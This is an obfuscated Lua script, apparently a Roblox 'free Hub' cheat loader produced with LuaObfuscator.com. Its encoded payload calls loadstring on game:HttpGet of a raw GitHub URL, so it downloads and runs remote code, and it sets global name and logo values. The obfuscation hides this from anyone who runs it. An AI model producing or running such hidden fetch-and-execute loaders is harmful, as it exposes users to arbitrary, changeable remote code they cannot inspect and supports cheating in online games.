--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 ;return (v33 * (732 -476)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=0;local v35;local v36;local v37;local v38;local v39;local v40;while true do if (v34==((3 -2) -0)) then v37=(369 -(10 + 8)) -(87 + 263) ;v38=(v21(v36,(1 + 0) -(0 -0) ,51 -(54 -23) ) * (((617 + 4) -(555 + 64))^(963 -(857 + 74)))) + v35 ;v34=570 -(367 + 201) ;end if ((0 -0)==v34) then v35=v24();v36=v24();v34=1;end if (v34==(929 -(214 + 713))) then v39=v21(v36,6 + 15 ,5 + 26 );v40=((v21(v36,909 -((724 -(416 + 26)) + 595) )==(1638 -(1523 + 114))) and  -(1 + 0)) or 1 ;v34=(794 -(368 + 423)) -(0 -0) ;end if (v34==(1068 -(68 + 997))) then if (v39==(1270 -(226 + 1044))) then if (v38==0) then return v40 * (0 -0) ;else v39=1;v37=0 + 0 ;end elseif (v39==(2164 -(32 + 85))) then return ((v38==(0 + 0)) and (v40 * ((1 + 0 + 0)/((1693 -736) -(892 + (503 -(145 + 293))))))) or (v40 * NaN) ;end return v8(v40,v39-(2440 -(1847 -(44 + 386))) ) * (v37 + (v38/(((1489 -(998 + 488)) -1)^(113 -61)))) ;end end end v26=nil;function v26(v41)local v42=0 + 0 ;local v43;local v44;while true do if (v42==(0 + 0)) then v43=nil;if  not v41 then local v96=0;while true do if (v96==(772 -(201 + 571))) then v41=v24();if (v41==(1138 -(116 + 1022))) then return "";end break;end end end v42=4 -3 ;end if ((1 + (0 -0))==v42) then v43=v3(v16,v19,(v19 + v41) -(1 + 0) );v19=v19 + v41 ;v42=7 -5 ;end if (v42==((3 + 4) -5)) then v44={};for v88=1, #v43 do v44[v88]=v2(v1(v3(v43,v88,v88)));end v42=3;end if (v42==((1747 -(261 + 624)) -(814 + 45))) then return v6(v44);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v45==(0 -0)) then v46=0 -0 ;v47=nil;v45=1 + 0 ;end if (v45~=(1209 -(696 + 510))) then else v52=nil;while true do local v90=0 -0 ;while true do if (v90~=(1263 -(1091 + 171))) then else if (v46==(1459 -(282 + 1174))) then local v99=811 -(569 + 242) ;while true do if (v99==(0 -0)) then for v123=1 + 0 ,v24() do v48[v123-(3 -2) ]=v29();end return v50;end end end if (v46==(6 -4)) then for v103=375 -(123 + 251) ,v51 do local v104=0 -0 ;local v105;local v106;while true do if ((1271 -(945 + 326))==v104) then v105=v22();v106=nil;v104=699 -(208 + 490) ;end if (v104~=1) then else if (v105==1) then v106=v22()~=(0 -0) ;elseif (v105==(1 + 1)) then v106=v25();elseif (v105==(2 + 1)) then v106=v26();end v52[v103]=v106;break;end end end v50[3 + 0 ]=v22();for v107=1,v24() do local v108=836 -(660 + 176) ;local v109;local v110;while true do if (v108==(1 + 0)) then while true do if (v109==(1500 -(1408 + 92))) then v110=v22();if (v21(v110,203 -(14 + 188) ,676 -(534 + 141) )~=(0 + 0)) then else local v169=0 + 0 ;local v170;local v171;local v172;local v173;while true do if (v169==(0 + 0)) then v170=0 + 0 ;v171=nil;v169=1 -0 ;end if (v169==(1 -0)) then v172=nil;v173=nil;v169=2;end if (v169~=(5 -3)) then else while true do if (v170~=(0 + 0)) then else local v177=0 + 0 ;while true do if (v177~=(0 + 0)) then else v171=v21(v110,2,1772 -(1749 + 20) );v172=v21(v110,1 + 3 ,402 -(115 + 281) );v177=2 -1 ;end if (v177~=(1 + 0)) then else v170=1323 -(1249 + 73) ;break;end end end if (v170==(2 -1)) then local v178=0 -0 ;while true do if (v178==1) then v170=869 -(550 + 317) ;break;end if (v178==0) then v173={v23(),v23(),nil,nil};if (v171==(0 + 0)) then local v183=285 -(134 + 151) ;local v184;while true do if (v183==(1665 -(970 + 695))) then v184=0 -0 ;while true do if ((1990 -(582 + 1408))==v184) then v173[10 -7 ]=v23();v173[11 -7 ]=v23();break;end end break;end end elseif (v171==(1 -0)) then v173[117 -(4 + 110) ]=v24();elseif (v171==(7 -5)) then v173[3]=v24() -((1826 -(1195 + 629))^(20 -4)) ;elseif (v171==(244 -(187 + 54))) then local v193=780 -(162 + 618) ;local v194;local v195;while true do if (0~=v193) then else v194=0 + 0 ;v195=nil;v193=1;end if (1~=v193) then else while true do if (v194==(0 + 0)) then v195=0 + 0 ;while true do if (v195==0) then v173[6 -3 ]=v24() -((5 -3)^(33 -17)) ;v173[6 -2 ]=v23();break;end end break;end end break;end end end v178=1 + 0 ;end end end if (v170~=3) then else if (v21(v172,1639 -(1373 + 263) ,1003 -(451 + 549) )~=(3 -2)) then else v173[2 + 2 ]=v52[v173[1 + 3 ]];end v47[v107]=v173;break;end if (v170~=(3 -1)) then else local v180=0;while true do if ((1 -0)~=v180) then else v170=4 -1 ;break;end if (v180==(0 + 0)) then if (v21(v172,1385 -(746 + 638) ,1258 -(1043 + 214) )~=(3 -2)) then else v173[1 + 1 ]=v52[v173[2 -0 ]];end if (v21(v172,2,343 -(218 + 123) )~=(1582 -(1535 + 46))) then else v173[3 + 0 ]=v52[v173[1 + 2 ]];end v180=1;end end end end break;end end end break;end end break;end if (v108~=(0 + 0)) then else local v126=560 -(306 + 254) ;while true do if (1~=v126) then else v108=1 + 0 ;break;end if (v126~=(0 -0)) then else v109=1467 -(899 + 568) ;v110=nil;v126=1 + 0 ;end end end end end v46=853 -(20 + 830) ;end break;end if (v90~=0) then else if (v46==(1 + 0)) then v50={v47,v48,nil,v49};v51=v24();v52={};v46=1 + 1 ;end if (v46==(0 + 0)) then local v101=0;local v102;while true do if (v101~=(0 + 0)) then else v102=0;while true do if ((0 -0)==v102) then v47={};v48={};v102=1;end if (v102~=1) then else v49={};v46=2 -1 ;break;end end break;end end end v90=604 -(268 + 335) ;end end end break;end if (v45~=(1553 -(1126 + 425))) then else v50=nil;v51=nil;v45=408 -(118 + 287) ;end if (1~=v45) then else v48=nil;v49=nil;v45=7 -5 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v82=v2(v0(v53,16));if v20 then local v91=v5(v82,v20);v20=nil;return v91;else return v82;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54=1121 -(118 + 1003) ;local v55;local v56;local v57;local v58;while true do if (v54==1) then return (v58 * (49097364 -32320148)) + (v57 * (123925 -58389)) + (v56 * (633 -(142 + 235))) + v55 ;end if (v54==0) then v55,v56,v57,v58=v1(v16,v19,v19 + (13 -10) );v19=v19 + 1 + 3 ;v54=978 -(553 + 424) ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v83=0,v76 do if (v83>=v70) then v74[v83-v70 ]=v75[v83 + 1 ];else v78[v83]=v75[v83 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v84=0;while true do if (v84==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then for v119=v80[2],v80[3] do v78[v119]=nil;end elseif (v81>1) then local v127=0;local v128;local v129;local v130;local v131;local v132;while true do if (v127==2) then v131=v78[v80[3]];v78[v132 + 1 ]=v131;v78[v132]=v131[v80[4]];v72=v72 + 1 ;v127=3;end if (v127==6) then v78[v132]=v78[v132](v13(v78,v132 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v127=7;end if (v127==3) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v127=4;end if (v127==1) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v132=v80[2];v127=2;end if (v127==7) then v72=v72 + 1 ;v80=v68[v72];v72=v80[3];break;end if (v127==0) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v127=1;end if (v127==5) then for v166=v132,v73 do v128=v128 + 1 ;v78[v166]=v129[v128];end v72=v72 + 1 ;v80=v68[v72];v132=v80[2];v127=6;end if (v127==4) then v132=v80[2];v129,v130=v71(v78[v132](v13(v78,v132 + 1 ,v80[3])));v73=(v130 + v132) -1 ;v128=0;v127=5;end end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=3) then v78[v80[2]]=v80[3];elseif (v81==4) then v78[v80[2]]();else local v133=0;local v134;local v135;while true do if (v133==0) then v134=v80[2];v135=v78[v80[3]];v133=1;end if (v133==1) then v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];break;end end end elseif (v81<=8) then if (v81<=6) then local v113=v80[2];local v114,v115=v71(v78[v113](v13(v78,v113 + 1 ,v80[3])));v73=(v115 + v113) -1 ;local v116=0;for v121=v113,v73 do local v122=0;while true do if (v122==0) then v116=v116 + 1 ;v78[v121]=v114[v116];break;end end end elseif (v81>7) then do return;end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81<=9) then local v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));elseif (v81==10) then v78[v80[2]][v80[3]]=v80[4];else v72=v80[3];end v72=v72 + 1 ;break;end if (v84==0) then v80=v68[v72];v81=v80[1];v84=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v85=0 + 0 ;local v86;while true do if (v85==(0 + 0)) then v86=(v65/((2 + 0)^(v66-((754 -(239 + 514)) + 0))))%((2 + 0)^(((v67-1) -(v66-(2 -1))) + (2 -1))) ;return v86-(v86%1) ;end end else local v87=((2 + 2) -2)^(v66-(1 + 0)) ;return (((v65%(v87 + v87))>=v87) and 1) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0047616D6503073O00482O7470476574035C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D5469656E4E677579656E5A2F4E677579656E5469656E53696D70526F73652F6D61696E2F4E677579656E4D696E685469656E4C6F6164657203023O005F4703043O004E616D6503083O0066722O652048756203043O004C6F676F030A3O0039313830362O3236373000223O0012033O00016O000100013O0026013O00020001000100040B3O00020001001203000100013O0026010001000F0001000200040B3O000F0001001207000200033O001202000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O00210001002601000100050001000100040B3O00050001001203000200013O002601000200190001000100040B3O00190001001207000300073O00300A000300080009001207000300073O00300A0003000A000B001203000200023O002601000200120001000200040B3O00120001001203000100023O00040B3O0005000100040B3O0012000100040B3O0005000100040B3O0021000100040B3O000200012O00083O00017O00",v9(),...);